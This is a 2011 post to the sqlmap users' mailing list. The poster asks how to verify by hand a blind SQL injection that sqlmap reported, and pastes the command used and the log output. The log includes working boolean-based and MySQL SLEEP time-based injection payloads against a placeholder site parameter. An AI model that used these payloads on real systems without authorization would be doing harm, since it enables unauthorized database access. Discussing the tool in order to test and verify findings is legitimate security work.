[sqlmap-users] manually verifying the vuln that sqlmap found
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] manually verifying the vuln that sqlmap found
|
From: Max P. <pai...@ya...> - 2011-09-06 05:49:45
|
Hello, I'm trying to manually reproduce a blind sql injection that sqlmap ( 0.9 ) found. here is how I ran it. ./sqlmap.py -v 6 --level 5 -u "http://site?id=9" --current-db -t debug.log debug.log does not show any sign of a current-db ( that is in output/site/log ) What am I missing? sqlmap identified the following injection points with a total of 403 HTTP(s) requests: --- log shows: Place: GET Parameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=9' AND 8437=8437 AND 'oCOc'='oCOc Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=9' AND SLEEP(5) AND 'BKLq'='BKLq ---current database: 'dbname' |
